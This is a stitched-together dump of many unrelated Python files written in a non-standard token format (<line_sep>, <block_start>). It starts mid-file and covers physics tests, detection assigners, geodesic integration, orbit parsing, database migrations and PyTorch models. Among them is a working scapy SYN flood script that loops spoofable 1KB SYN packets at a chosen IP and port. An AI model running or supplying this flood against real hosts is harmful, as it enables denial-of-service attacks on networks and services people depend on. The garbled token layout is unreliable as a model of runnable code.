"ProjectParametersDEM.json")<with_stmt>open(parameters_file_name 'r')<as>parameter_file<block_start>project_parameters=KratosMultiphysics.Parameters(parameter_file.read())<block_end>project_parameters["SearchTolerance"].SetDouble(1e-04)<line_sep>project_parameters["search_tolerance_against_walls"].SetDouble(1e-04)<line_sep>project_parameters["NeighbourSearchFrequency"].SetInt(20)<line_sep>model=KratosMultiphysics.Model()<line_sep>auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchTolerance2 model project_parameters auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())<block_end>@classmethod<def_stmt>test_SearchD self<block_start>path=os.path.join(os.path.dirname(os.path.realpath(__file__)) "test_search_tolerance")<line_sep>parameters_file_name=os.path.join(path "ProjectParametersDEM.json")<with_stmt>open(parameters_file_name 'r')<as>parameter_file<block_start>project_parameters=KratosMultiphysics.Parameters(parameter_file.read())<block_end>project_parameters["SearchTolerance"].SetDouble(1e-03)<line_sep>project_parameters["search_tolerance_against_walls"].SetDouble(1e-03)<line_sep>project_parameters["NeighbourSearchFrequency"].SetInt(20)<line_sep>model=KratosMultiphysics.Model()<line_sep>auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchTolerance3 model project_parameters auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>Logger.GetDefaultOutput().SetSeverity(Logger.Severity.WARNING)<line_sep>KratosUnittest.main()<block_end>
<import_from_stmt>.base_assigner BaseAssigner<import_from_stmt>.max_iou_assigner MaxIoUAssigner<import_from_stmt>.approx_max_iou_assigner ApproxMaxIoUAssigner<import_from_stmt>.assign_result AssignResult<import_from_stmt>.max_iou_assigner_hbb_cy MaxIoUAssignerCy<import_from_stmt>.max_iou_assigner_rbbox MaxIoUAssignerRbbox<import_from_stmt>.approx_max_iou_assigner_cy ApproxMaxIoUAssignerCy<line_sep>__all__=['BaseAssigner' 'MaxIoUAssigner' 'ApproxMaxIoUAssigner' 'AssignResult' 'MaxIoUAssignerCy' 'MaxIoUAssignerRbbox' 'ApproxMaxIoUAssignerCy']<line_sep>
<import_stmt>numpy<as>np<import_stmt>scipy<import_stmt>cv2<def_stmt>get_pixel_neighbors height width<block_start>""" Estimate the 4 neighbors of every pixel in an image :param height: image height :param width: image width :return: pixel index - neighbor index lists """<line_sep>pix_id=[]<line_sep>neighbor_id=[]<for_stmt>i range(height)<block_start><for_stmt>j range(width)<block_start>n=[]<if_stmt>i<eq>0<block_start>n=n+[(i+1)<times>width+j]<block_end><elif_stmt>i<eq>height-1<block_start>n=n+[(i-1)<times>width+j]<block_end><else_stmt><block_start>n=n+[(i+1)<times>width+j (i-1)<times>width+j]<block_end><if_stmt>j<eq>0<block_start>n=n+[i<times>width+j+1]<block_end><elif_stmt>j<eq>width-1<block_start>n=n+[i<times>width+j-1]<block_end><else_stmt><block_start>n=n+[i<times>width+j+1 i<times>width+j-1]<block_end><for_stmt>k n<block_start>pix_id.append(i<times>width+j)<line_sep>neighbor_id.append(k)<block_end><block_end><block_end><return>pix_id neighbor_id<block_end>limps=np.array([[0 1] [1 2] [2 3] [3 4] [1 5] [5 6] [6 7] [1 11] [11 12] [12 13] [1 8] [8 9] [9 10] [14 15] [16 17] [0 14] [0 15] [14 16] [15 17]])<def_stmt>get_instance_skeleton_buffer h w poses<block_start>output=np.zeros((h w 3) dtype=np.float32)-1<for_stmt>i range(len(poses))<block_start>keypoints=poses[i]<line_sep>lbl=i<for_stmt>k range(limps.shape[0])<block_start>kp1,kp2=limps[k :].astype(int)<line_sep>bone_start=keypoints[kp1 :]<line_sep>bone_end=keypoints[kp2 :]<line_sep>bone_start[0]=np.maximum(np.minimum(bone_start[0] w-1) 0.)<line_sep>bone_start[1]=np.maximum(np.minimum(bone_start[1] h-1) 0.)<line_sep>bone_end[0]=np.maximum(np.minimum(bone_end[0] w-1) 0.)<line_sep>bone_end[1]=np.maximum(np.minimum(bone_end[1] h-1) 0.)<if_stmt>bone_start[2]<g>0.0<block_start>output[int(bone_start[1]) int(bone_start[0])]=1<line_sep>cv2.circle(output (int(bone_start[0]) int(bone_start[1])) 2 (lbl 0 0) -1)<block_end><if_stmt>bone_end[2]<g>0.0<block_start>output[int(bone_end[1]) 
int(bone_end[0])]=1<line_sep>cv2.circle(output (int(bone_end[0]) int(bone_end[1])) 2 (lbl 0 0) -1)<block_end><if_stmt>bone_start[2]<g>0.0<and>bone_end[2]<g>0.0<block_start>cv2.line(output (int(bone_start[0]) int(bone_start[1])) (int(bone_end[0]) int(bone_end[1])) (lbl 0 0) 1)<block_end><block_end><block_end><return>output[: : 0]<block_end><def_stmt>get_poseimg_for_opt sel_pose poseimg init_mask n_bg=50<block_start>h,w=init_mask.shape[:2]<line_sep>bg_label=1<line_sep>output=np.zeros((h w 3) dtype=np.float32)-1<line_sep>II,JJ=(poseimg<g>0).nonzero()<line_sep>Isel,J_sel=(poseimg<eq>sel_pose).nonzero()<line_sep>output[II JJ]=0<line_sep>output[Isel J_sel]=2<line_sep>init_mask[Isel J_sel]=1<line_sep># Sample also from points in the field init_mask=cv2.dilate(init_mask np.ones((25 25) np.uint8) iterations=1)<line_sep>I_bg,J_bg=(init_mask<eq>0).nonzero()<line_sep>rand_index=np.random.permutation(len(I_bg))[:n_bg]<line_sep>bg_points=np.array([J_bg[rand_index] I_bg[rand_index]]).T<for_stmt>k range(bg_points.shape[0])<block_start>cv2.circle(output (int(bg_points[k 0]) int(bg_points[k 1])) 2 (bg_label 0 0) -1)<block_end><return>output[: : 0]<block_end><def_stmt>draw_poses_for_optimization sel_pose keypoints_list init_mask n_bg=50<block_start>h,w=init_mask.shape[:2]<line_sep>bg_label=0<line_sep>output=np.zeros((h w 3) dtype=np.float32)-1<for_stmt>i range(len(keypoints_list))<block_start>keypoints=keypoints_list[i]<if_stmt>i<eq>sel_pose<block_start>lbl=2<block_end><else_stmt><block_start>lbl=1<block_end><for_stmt>k range(limps.shape[0])<block_start>kp1,kp2=limps[k :].astype(int)<line_sep>bone_start=keypoints[kp1 :]<line_sep>bone_end=keypoints[kp2 :]<line_sep>bone_start[0]=np.maximum(np.minimum(bone_start[0] w-1) 0.)<line_sep>bone_start[1]=np.maximum(np.minimum(bone_start[1] h-1) 0.)<line_sep>bone_end[0]=np.maximum(np.minimum(bone_end[0] w-1) 0.)<line_sep>bone_end[1]=np.maximum(np.minimum(bone_end[1] h-1) 0.)<if_stmt>bone_start[2]<g>0.0<block_start>output[int(bone_start[1]) 
int(bone_start[0])]=1<line_sep>cv2.circle(output (int(bone_start[0]) int(bone_start[1])) 2 (lbl 0 0) -1)<block_end><if_stmt>bone_end[2]<g>0.0<block_start>output[int(bone_end[1]) int(bone_end[0])]=1<line_sep>cv2.circle(output (int(bone_end[0]) int(bone_end[1])) 2 (lbl 0 0) -1)<block_end><if_stmt>bone_start[2]<g>0.0<and>bone_end[2]<g>0.0<block_start>cv2.line(output (int(bone_start[0]) int(bone_start[1])) (int(bone_end[0]) int(bone_end[1])) (lbl 0 0) 1)<block_end><block_end><block_end># Draw circles for the bg players keypoints # for k in range(bg_keypoints.shape[0]): # cv2.circle(output, (int(bg_keypoints[k, 0]), int(bg_keypoints[k, 1])), 2, (bg_keypoint_lable, 0, 0), -1) # Sample also from points in the field init_mask=cv2.dilate(init_mask np.ones((5 5) np.uint8) iterations=1)<line_sep>I_bg,J_bg=(init_mask<eq>0).nonzero()<line_sep>rand_index=np.random.permutation(len(I_bg))[:n_bg]<line_sep>bg_points=np.array([J_bg[rand_index] I_bg[rand_index]]).T<for_stmt>k range(bg_points.shape[0])<block_start>cv2.circle(output (int(bg_points[k 0]) int(bg_points[k 1])) 2 (bg_label 0 0) -1)<block_end><return>output[: : 0]<block_end><def_stmt>set_U strokes h w dim<block_start>N=h<times>w<line_sep>y=np.zeros((N dim))<line_sep>U=scipy.sparse.lil_matrix((N N))<for_stmt>p range(strokes.shape[0])<block_start>i=strokes[p 1]<line_sep>j=strokes[p 0]<line_sep>index=int(i<times>w+j)<for_stmt>ii range(dim)<block_start>y[index ii]=strokes[p ii+2]<block_end>U[index index]=1<block_end><return>U y<block_end><def_stmt>set_DW image edges=<none> sigma1=1000. 
sigma2=0.01<block_start>image=image.astype(float)<line_sep>h,w=image.shape[0:2]<line_sep>N=h<times>w<line_sep>pixd,neighborid=get_pixel_neighbors(h w)<line_sep>i,j=np.unravel_index(pixd (h w))<line_sep>ii,jj=np.unravel_index(neighborid (h w))<line_sep>pix_diff=np.squeeze((image[i j :]-image[ii jj :])<power>2)<if_stmt>len(pix_diff.shape)<eq>1<block_start>pix_diff=pix_diff[: np.newaxis]<block_end>weight0=np.exp(-(np.sum(pix_diff axis=1))/sigma1)<line_sep>weight1=np.exp(-((edges[i j])<power>2)/sigma2)<line_sep># neighbor_info = np.vstack((pixd, neighborid, weight0)).T M=len(pixd)<line_sep>D=scipy.sparse.lil_matrix((M N))<line_sep>W=scipy.sparse.lil_matrix((M M))<line_sep>p=np.arange(0 M 1)<line_sep>D[p pixd]=1<line_sep>D[p neighborid]=-1<line_sep>W[p p]=weight1<line_sep><return>D W<block_end>
<import_stmt>warnings<import_stmt>numpy<as>np<import_from_stmt>einsteinpy.integrators GeodesicIntegrator<import_from_stmt>.utils _P _kerr _kerrnewman _sch<class_stmt>Geodesic<block_start>""" Base Class for defining Geodesics Working in Geometrized Units (M-Units), with :math:`c = G = M = k_e = 1` """<def_stmt>__init__ self metric metric_params position momentum time_like=<true> return_cartesian=<true> **kwargs <block_start>""" Constructor Parameters ---------- metric : str Name of the metric. Currently, these metrics are supported: 1. Schwarzschild 2. Kerr 3. KerrNewman metric_params : array_like Tuple of parameters to pass to the metric E.g., ``(a,)`` for Kerr position : array_like 3-Position 4-Position is initialized by taking ``t = 0.0`` momentum : array_like 3-Momentum 4-Momentum is calculated automatically, considering the value of ``time_like`` time_like : bool, optional Determines type of Geodesic ``True`` for Time-like geodesics ``False`` for Null-like geodesics Defaults to ``True`` return_cartesian : bool, optional Whether to return calculated positions in Cartesian Coordinates This only affects the coordinates. Momenta are dimensionless quantities, and are returned in Spherical Polar Coordinates. Defaults to ``True`` kwargs : dict Keyword parameters for the Geodesic Integrator See 'Other Parameters' below. Other Parameters ---------------- steps : int Number of integration steps Defaults to ``50`` delta : float Initial integration step-size Defaults to ``0.5`` rtol : float Relative Tolerance Defaults to ``1e-2`` atol : float Absolute Tolerance Defaults to ``1e-2`` order : int Integration Order Defaults to ``2`` omega : float Coupling between Hamiltonian Flows Smaller values imply smaller integration error, but too small values can make the equation of motion non-integrable. For non-capture trajectories, ``omega = 1.0`` is recommended. 
For trajectories, that either lead to a capture or a grazing geodesic, a decreased value of ``0.01`` or less is recommended. Defaults to ``1.0`` suppress_warnings : bool Whether to suppress warnings during simulation Warnings are shown for every step, where numerical errors exceed specified tolerance (controlled by ``rtol`` and ``atol``) Defaults to ``False`` """<line_sep># Contravariant Metrics, defined so far _METRICS={"Schwarzschild":_sch "Kerr":_kerr "KerrNewman":_kerrnewman }<if_stmt>metric<not><in>_METRICS<block_start><raise>NotImplementedError(f"'{metric}' is unsupported. Currently, these metrics are supported:\ \n1. Schwarzschild\n2. Kerr\n3. KerrNewman")<block_end>self.metric_name=metric<line_sep>self.metric=_METRICS[metric]<line_sep>self.metric_params=metric_params<if_stmt>metric<eq>"Schwarzschild"<block_start>self.metric_params=(0.0 )<block_end>self.position=np.array([0.0 *position])<line_sep>self.momentum=_P(self.metric metric_params self.position momentum time_like)<line_sep>self.time_like=time_like<line_sep>self.kind="Time-like"<if>time_like<else>"Null-like"<line_sep>self.coords="Cartesian"<if>return_cartesian<else>"Spherical Polar"<line_sep>self._trajectory=self.calculate_trajectory(**kwargs)<block_end><def_stmt>__repr__ self<block_start><return>f"""Geodesic Object:(\n\ Type : ({self.kind}),\n\ Metric : ({self.metric_name}),\n\ Metric Parameters : ({self.metric_params}),\n\ Initial 4-Position : ({self.position}),\n\ Initial 4-Momentum : ({self.momentum}),\n\ Trajectory = (\n\ {self.trajectory}\n\ ),\n\ Output Position Coordinate System = ({self.coords})\n\ ))"""<block_end><def_stmt>__str__ self<block_start><return>self.__repr__()<block_end>@property<def_stmt>trajectory self<block_start>""" Returns the trajectory of the test particle """<line_sep><return>self._trajectory<block_end><def_stmt>calculate_trajectory self **kwargs<block_start>""" Calculate trajectory in spacetime Parameters ---------- kwargs : dict Keyword parameters for the Geodesic 
Integrator See 'Other Parameters' below. Returns ------- ~numpy.ndarray N-element numpy array, containing step count ~numpy.ndarray Shape-(N, 8) numpy array, containing (4-Position, 4-Momentum) for each step Other Parameters ---------------- steps : int Number of integration steps Defaults to ``50`` delta : float Initial integration step-size Defaults to ``0.5`` rtol : float Relative Tolerance Defaults to ``1e-2`` atol : float Absolute Tolerance Defaults to ``1e-2`` order : int Integration Order Defaults to ``2`` omega : float Coupling between Hamiltonian Flows Smaller values imply smaller integration error, but too small values can make the equation of motion non-integrable. For non-capture trajectories, ``omega = 1.0`` is recommended. For trajectories, that either lead to a capture or a grazing geodesic, a decreased value of ``0.01`` or less is recommended. Defaults to ``1.0`` suppress_warnings : bool Whether to suppress warnings during simulation Warnings are shown for every step, where numerical errors exceed specified tolerance (controlled by ``rtol`` and ``atol``) Defaults to ``False`` """<line_sep>g,g_prms=self.metric self.metric_params<line_sep>q0,p0=self.position self.momentum<line_sep>tl=self.time_like<line_sep>N=kwargs.get("steps" 50)<line_sep>dl=kwargs.get("delta" 0.5)<line_sep>rtol=kwargs.get("rtol" 1e-2)<line_sep>atol=kwargs.get("atol" 1e-2)<line_sep>order=kwargs.get("order" 2)<line_sep>omega=kwargs.get("omega" 1.0)<line_sep>sw=kwargs.get("suppress_warnings" <false>)<line_sep>steps=np.arange(N)<line_sep>geodint=GeodesicIntegrator(metric=g metric_params=g_prms q0=q0 p0=p0 time_like=tl steps=N delta=dl rtol=rtol atol=atol order=order omega=omega suppress_warnings=sw )<for_stmt>i steps<block_start>geodint.step()<block_end>vecs=np.array(geodint.results dtype=float)<line_sep>q1=vecs[: 0]<line_sep>p1=vecs[: 1]<line_sep>results=np.hstack((q1 p1))<line_sep># Ignoring # q2 = vecs[:, 2] # p2 = vecs[:, 3] <if_stmt>self.coords<eq>"Cartesian"# Converting to 
Cartesian from Spherical Polar Coordinates # Note that momenta cannot be converted this way, # due to ambiguities in the signs of v_r and v_th (velocities) <block_start>t,r,th,ph=q1.T<line_sep>pt,pr,pth,pph=p1.T<line_sep>x=r<times>np.sin(th)<times>np.cos(ph)<line_sep>y=r<times>np.sin(th)<times>np.sin(ph)<line_sep>z=r<times>np.cos(th)<line_sep>cart_results=np.vstack((t x y z pt pr pth pph)).T<line_sep><return>steps cart_results<block_end><return>steps results<block_end><block_end><class_stmt>Nulllike(Geodesic)<block_start>""" Class for defining Null-like Geodesics """<def_stmt>__init__ self metric metric_params position momentum return_cartesian=<true> **kwargs<block_start>""" Constructor Parameters ---------- metric : str Name of the metric. Currently, these metrics are supported: 1. Schwarzschild 2. Kerr 3. KerrNewman metric_params : array_like Tuple of parameters to pass to the metric E.g., ``(a,)`` for Kerr position : array_like 3-Position 4-Position is initialized by taking ``t = 0.0`` momentum : array_like 3-Momentum 4-Momentum is calculated automatically, considering the value of ``time_like`` return_cartesian : bool, optional Whether to return calculated positions in Cartesian Coordinates This only affects the coordinates. The momenta dimensionless quantities, and are returned in Spherical Polar Coordinates. Defaults to ``True`` kwargs : dict Keyword parameters for the Geodesic Integrator See 'Other Parameters' below. Other Parameters ---------------- steps : int Number of integration steps Defaults to ``50`` delta : float Initial integration step-size Defaults to ``0.5`` rtol : float Relative Tolerance Defaults to ``1e-2`` atol : float Absolute Tolerance Defaults to ``1e-2`` order : int Integration Order Defaults to ``2`` omega : float Coupling between Hamiltonian Flows Smaller values imply smaller integration error, but too small values can make the equation of motion non-integrable. For non-capture trajectories, ``omega = 1.0`` is recommended. 
For trajectories, that either lead to a capture or a grazing geodesic, a decreased value of ``0.01`` or less is recommended. Defaults to ``1.0`` suppress_warnings : bool Whether to suppress warnings during simulation Warnings are shown for every step, where numerical errors exceed specified tolerance (controlled by ``rtol`` and ``atol``) Defaults to ``False`` """<line_sep>super().__init__(metric=metric metric_params=metric_params position=position momentum=momentum time_like=<false> return_cartesian=return_cartesian **kwargs )<block_end><block_end><class_stmt>Timelike(Geodesic)<block_start>""" Class for defining Time-like Geodesics """<def_stmt>__init__ self metric metric_params position momentum return_cartesian=<true> **kwargs<block_start>""" Constructor Parameters ---------- metric : str Name of the metric. Currently, these metrics are supported: 1. Schwarzschild 2. Kerr 3. KerrNewman metric_params : array_like Tuple of parameters to pass to the metric E.g., ``(a,)`` for Kerr position : array_like 3-Position 4-Position is initialized by taking ``t = 0.0`` momentum : array_like 3-Momentum 4-Momentum is calculated automatically, considering the value of ``time_like`` return_cartesian : bool, optional Whether to return calculated positions in Cartesian Coordinates This only affects the coordinates. The momenta dimensionless quantities, and are returned in Spherical Polar Coordinates. Defaults to ``True`` kwargs : dict Keyword parameters for the Geodesic Integrator See 'Other Parameters' below. Other Parameters ---------------- steps : int Number of integration steps Defaults to ``50`` delta : float Initial integration step-size Defaults to ``0.5`` rtol : float Relative Tolerance Defaults to ``1e-2`` atol : float Absolute Tolerance Defaults to ``1e-2`` order : int Integration Order Defaults to ``2`` omega : float Coupling between Hamiltonian Flows Smaller values imply smaller integration error, but too small values can make the equation of motion non-integrable. 
For non-capture trajectories, ``omega = 1.0`` is recommended. For trajectories, that either lead to a capture or a grazing geodesic, a decreased value of ``0.01`` or less is recommended. Defaults to ``1.0`` suppress_warnings : bool Whether to suppress warnings during simulation Warnings are shown for every step, where numerical errors exceed specified tolerance (controlled by ``rtol`` and ``atol``) Defaults to ``False`` """<line_sep>super().__init__(metric=metric metric_params=metric_params position=position momentum=momentum time_like=<true> return_cartesian=return_cartesian **kwargs )<block_end><block_end>
<import_stmt>os<import_stmt>logging<import_stmt>datetime<import_from_stmt>isceobj.Orbit.Orbit Orbit<import_from_stmt>isceobj.Orbit.Orbit StateVector<import_from_stmt>isceobj.Util.decorators type_check logged pickled<class_stmt>PRC(object)<block_start>"""A class to parse orbit data from D-PAF"""<line_sep>logging_name="isce.orbit.PRC.PRC"<line_sep>@logged<def_stmt>__init__ self file=<none><block_start>self.filename=file<line_sep>self.firstEpoch=0<line_sep>self.lastEpoch=0<line_sep>self.tdtOffset=0<line_sep>self.orbit=Orbit()<line_sep>self.orbit.configure()<line_sep>self.orbit.setOrbitQuality('Precise')<line_sep>self.orbit.setOrbitSource('PRC')<line_sep><return><none><block_end><def_stmt>getOrbit self<block_start><return>self.orbit<block_end><def_stmt>parse self#People still seem to be using the old .Z format #Adding support for it - PSA <block_start><if_stmt>os.path.splitext(self.filename)[1]<eq>'.Z'<block_start><import_from_stmt>subprocess Popen PIPE<line_sep>fp=Popen(["zcat" self.filename] stdout=PIPE).stdout<block_end><else_stmt><block_start>fp=open(self.filename 'r')<block_end>data=fp.read()<line_sep>fp.close()<line_sep>numLines=int(len(data)/130)<for_stmt>i range(numLines)<block_start>line=data[i<times>130:(i+1)<times>130]<line_sep>self.__parseLine(line)<block_end><block_end><def_stmt>__parseLine self line<block_start>"""Parse a line from a PRC orbit file"""<line_sep>referenceFrame=line[0:6].decode('utf-8')<if_stmt>(referenceFrame<eq>'STATE ')<block_start>self.__parseStateLine(line)<block_end><if_stmt>(referenceFrame<eq>'STTERR')<block_start>self.__parseTerrestrialLine(line)<block_end><block_end><def_stmt>__parseTerrestrialLine self 
line<block_start>j2000Day=float(line[14:20])/10.0+0.5<line_sep>tdt=float(line[20:31])/1e6<line_sep>x=float(line[31:43])/1e3<line_sep>y=float(line[43:55])/1e3<line_sep>z=float(line[55:67])/1e3<line_sep>vx=float(line[67:78])/1e6<line_sep>vy=float(line[78:89])/1e6<line_sep>vz=float(line[89:100])/1e6<line_sep>quality=line[127]<line_sep>tdt=tdt-self.tdtOffset<line_sep>dt=self.__j2000ToDatetime(j2000Day tdt)<line_sep>sv=StateVector()<line_sep>sv.configure()<line_sep>sv.setTime(dt)<line_sep>sv.setPosition([x y z])<line_sep>sv.setVelocity([vx vy vz])<line_sep>self.orbit.addStateVector(sv)<block_end><def_stmt>__parseStateLine self line<block_start>self.firstEpoch=self.__j2000ToDatetime(float(line[6:12])/10.0 0.0)<line_sep>self.lastEpoch=self.__j2000ToDatetime(float(line[12:18])/10.0 0.0)<line_sep>self.tdtOffset=float(line[47:52])<line_sep>self.tdtOffset=self.tdtOffset/1e3<block_end><def_stmt>__j2000ToDatetime self j2000Day tdt<block_start>"""Convert the number of days since 1 Jan. 2000 to a datetime object"""<line_sep>j2000=datetime.datetime(year=2000 month=1 day=1)<line_sep>dt=j2000+datetime.timedelta(days=j2000Day seconds=tdt)<line_sep><return>dt<block_end><pass><block_end>@pickled<class_stmt>Arclist(object)<block_start>"""A class for parsing the old ROI_PAC PRC arclist file"""<line_sep>logging_name='isce.Orbit.PRC.Arclist'<line_sep>@logged<def_stmt>__init__ self file=<none><block_start>self.filename=file<line_sep>self.arclist=[]<line_sep><return><none><block_end><def_stmt>parse self<block_start>fp=open(self.filename 'r')<for_stmt>line fp.readlines()<block_start>data=line.split()<line_sep>start=float(data[1])/10.0<line_sep>end=float(data[2])/10.0<line_sep>arc=Arc()<line_sep>arc.filename=data[0]<line_sep>arc.setStart(self.__j2000ToDatetime(start 86400.0/2.0))<line_sep>arc.setStop(self.__j2000ToDatetime(end 86400.0/2.0))<line_sep>self.arclist.append(arc)<block_end><block_end><def_stmt>getArc self time<block_start>"""Given a datetime object, determine the first arc number 
that contains precise ephemeris"""<line_sep>inRange=[]<line_sep># Make a list containing all of the # arcs that span <code>time</code> <for_stmt>arc self.arclist<block_start><if_stmt>(arc.inRange(time))<block_start>inRange.append(arc)<block_end><block_end><if_stmt>(len(inRange)<eq>0)<block_start>self.logger.error("No valid arcs found spanning %s"%(time))<block_end><if_stmt>(len(inRange)<g>0)<block_start>self.logger.info("%s valid arcs found spanning %s"%(len(inRange) time))<block_end><return>inRange[0].filename<block_end><def_stmt>getOrbitFile self time<block_start>filename=self.getArc(time)<line_sep><return>filename<block_end><def_stmt>__j2000ToDatetime self j2000Day tdt<block_start>"""Convert the number of days since 1 Jan. 2000 to a datetime object"""<line_sep>j2000=datetime.datetime(year=2000 month=1 day=1)<line_sep>dt=j2000+datetime.timedelta(days=j2000Day seconds=tdt)<line_sep><return>dt<block_end><block_end><class_stmt>Arc(object)<block_start>"""A class representing an orbital arc segment"""<def_stmt>__init__ self<block_start>self.filename=<none><line_sep>self._start=<none><line_sep>self._stop=<none><block_end><def_stmt>getStart self<block_start><return>self._start<block_end>@type_check(datetime.datetime)<def_stmt>setStart self start<block_start>self._start=start<block_end><def_stmt>getStop self<block_start><return>self._stop<block_end>@type_check(datetime.datetime)<def_stmt>setStop self stop<block_start>self._stop=stop<block_end><def_stmt>inRange self time<block_start>"""Determine whether a time stamp lies within the start and stop times"""<line_sep><return>self._start<le>time<le>self._stop<block_end>start=property(fget=getStart fset=setStart)<line_sep>stop=property(fget=getStop fset=setStop)<line_sep><pass><block_end>
<import_from_stmt>authx.middleware.Oauth2 MiddlewareOauth2<line_sep>__all__=["MiddlewareOauth2"]<line_sep>
"""Remove dead ads table Revision ID: <KEY> Revises: 1307b62614a4 Create Date: 2020-02-27 23:14:41.314000 """<line_sep># revision identifiers, used by Alembic. revision='<KEY>'<line_sep>down_revision='1307b62614a4'<import_from_stmt>alembic op# lgtm[py/unused-import] <import_stmt>sqlalchemy<as>sa# lgtm[py/unused-import] <import_from_stmt>sqlalchemy.dialects postgresql<def_stmt>upgrade # ### commands auto generated by Alembic - please adjust! ### <block_start>op.drop_index('ind_ads_end' table_name='ads')<line_sep>op.drop_table('ads')<line_sep># ### end Alembic commands ### <block_end><def_stmt>downgrade # ### commands auto generated by Alembic - please adjust! ### <block_start>op.create_table('ads' sa.Column('id' sa.INTEGER() autoincrement=<true> nullable=<false>) sa.Column('owner' sa.VARCHAR(length=254) autoincrement=<false> nullable=<false>) sa.Column('link_target' sa.TEXT() autoincrement=<false> nullable=<false>) sa.Column('file' sa.INTEGER() autoincrement=<false> nullable=<false>) sa.Column('start' postgresql.TIMESTAMP() autoincrement=<false> nullable=<true>) sa.Column('end' postgresql.TIMESTAMP() autoincrement=<false> nullable=<true>) sa.ForeignKeyConstraint(['file'] [u'media.mediaid'] name=u'ads_file_fkey' onupdate=u'CASCADE' ondelete=u'CASCADE') sa.PrimaryKeyConstraint('id' name=u'ads_pkey'))<line_sep>op.create_index('ind_ads_end' 'ads' ['end'] unique=<false>)<line_sep># ### end Alembic commands ### <block_end>
# contains neither Process object nor execute() function
# Generated by Django 2.0.4 on 2018-04-13 07:47 <import_from_stmt>django.conf settings<import_from_stmt>django.db migrations models<import_stmt>django.utils.timezone<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('report_builder_scheduled' '0001_initial') ]<line_sep>operations=[migrations.AlterField(model_name='scheduledreport' name='last_run_at' field=models.DateTimeField(auto_now_add=<true> default=django.utils.timezone.now) preserve_default=<false> ) migrations.AlterField(model_name='scheduledreport' name='users' field=models.ManyToManyField(blank=<true> help_text='Staff users to notify' limit_choices_to={'is_staff':<true>} to=settings.AUTH_USER_MODEL) ) ]<block_end>
<import_stmt>torch<import_from_stmt>torch nn<import_from_stmt>torch.nn functional<as>F<import_from_stmt>.resnet resnet18 resnet34<import_from_stmt>.segmentation SegmentationHead<import_from_stmt>.attention Attention<import_from_stmt>.erfnet ERFNet<class_stmt>Normalize(nn.Module)<block_start>""" ImageNet normalization """<def_stmt>__init__ self mean std<block_start>super().__init__()<line_sep>self.mean=nn.Parameter(torch.tensor(mean) requires_grad=<false>)<line_sep>self.std=nn.Parameter(torch.tensor(std) requires_grad=<false>)<block_end><def_stmt>forward self x<block_start><return>(x-self.mean[<none> : <none> <none>])/self.std[<none> : <none> <none>]<block_end><block_end><class_stmt>RGBModel(nn.Module)<block_start><def_stmt>__init__ self seg_channels pretrained=<true><block_start>super().__init__()<line_sep>self.num_channels=len(seg_channels)<line_sep>self.backbone=resnet18(pretrained=pretrained)<line_sep>self.normalize=Normalize(mean=[0.485 0.456 0.406] std=[0.229 0.224 0.225])<line_sep>self.head=<none><block_end><def_stmt>forward self rgb<block_start>embd=self.backbone(self.normalize(rgb/255.))<line_sep><return>self.head(embd).squeeze(-1)<block_end><block_end><class_stmt>RGBSegmentationModel(nn.Module)<block_start><def_stmt>__init__ self seg_channels<block_start>super().__init__()<line_sep>self.erfnet=ERFNet(len(seg_channels)+1)<line_sep>self.normalize=<lambda>x:(x/255.-.5)<times>2<block_end><def_stmt>forward self rgb<block_start><return>self.erfnet(self.normalize(rgb))<block_end><block_end><class_stmt>RGBBrakePredictionModel(nn.Module)<block_start><def_stmt>__init__ self seg_channels pretrained=<true><block_start>super().__init__()<line_sep>self.conv_backbone=resnet18(pretrained=pretrained)<line_sep>self.normalize=Normalize(mean=[0.485 0.456 0.406] std=[0.229 0.224 0.225])<line_sep>self.seg_head=SegmentationHead(512 len(seg_channels)+1)<line_sep>self.classifier=nn.Sequential(nn.Linear(1024 1) nn.Sigmoid())<block_end><def_stmt>forward self rgb1 rgb2 
mask=<false><block_start>x1=self.conv_backbone(self.normalize(rgb1/255.))<line_sep>x2=self.conv_backbone(self.normalize(rgb2/255.))<line_sep>h1=x1.mean(dim=[2 3])<line_sep>h2=x2.mean(dim=[2 3])<line_sep>pred_bra=self.classifier(torch.cat([h1 h2] dim=1))<if_stmt>mask<block_start>pred_sem1=F.interpolate(self.seg_head(x1) scale_factor=4)<line_sep>pred_sem2=F.interpolate(self.seg_head(x2) scale_factor=4)<line_sep><return>pred_bra[: 0] pred_sem1 pred_sem2<block_end><else_stmt><block_start><return>pred_bra[: 0]<block_end><block_end><block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep># BTagPerformanceAnalyzer configuration <import_from_stmt>Validation.RecoB.bTagAnalysis_cfi *<line_sep>bTagValidationHarvest=bTagHarvestMC.clone()<import_from_stmt>DQMOffline.RecoB.bTagAnalysisData_cfi *<line_sep>bTagValidationHarvestData=bTagHarvest.clone()<line_sep>
<import_from_stmt>scapy.all *<import_stmt>argparse<line_sep>parser=argparse.ArgumentParser(description="Simple SYN Flood Script")<line_sep>parser.add_argument("target_ip" help="Target IP address (e.g router's IP)")<line_sep>parser.add_argument("-p" "--port" help="Destination port (the port of the target's machine service, \ e.g 80 for HTTP, 22 for SSH and so on).")<line_sep># parse arguments from the command line args=parser.parse_args()<line_sep># target IP address (should be a testing router/firewall) target_ip=args.target_ip<line_sep># the target port u want to flood target_port=args.port<line_sep># forge IP packet with target ip as the destination IP address ip=IP(dst=target_ip)<line_sep># or if you want to perform IP Spoofing (will work as well) # ip = IP(src=RandIP("192.168.1.1/24"), dst=target_ip) # forge a TCP SYN packet with a random source port # and the target port as the destination port tcp=TCP(sport=RandShort() dport=target_port flags="S")<line_sep># add some flooding data (1KB in this case, don't increase it too much, # otherwise, it won't work.) raw=Raw(b"X"<times>1024)<line_sep># stack up the layers p=ip/tcp/raw<line_sep># send the constructed packet in a loop until CTRL+C is detected send(p loop=1 verbose=0)<line_sep>
a=1<line_sep>b=2<line_sep>print('a = '+str(a)+','+'b = '+str(b))<line_sep>temp=a<line_sep>a=b<line_sep>b=temp<line_sep>print('a = '+str(a)+','+'b = '+str(b))<line_sep>
import pandas as pd
import numpy as np
from numpy import corrcoef
import matplotlib.pyplot as plt
from sklearn.feature_selection import chi2
from sklearn.feature_selection import f_classif
from math import *

plt.style.use('ggplot')
fig = plt.figure()
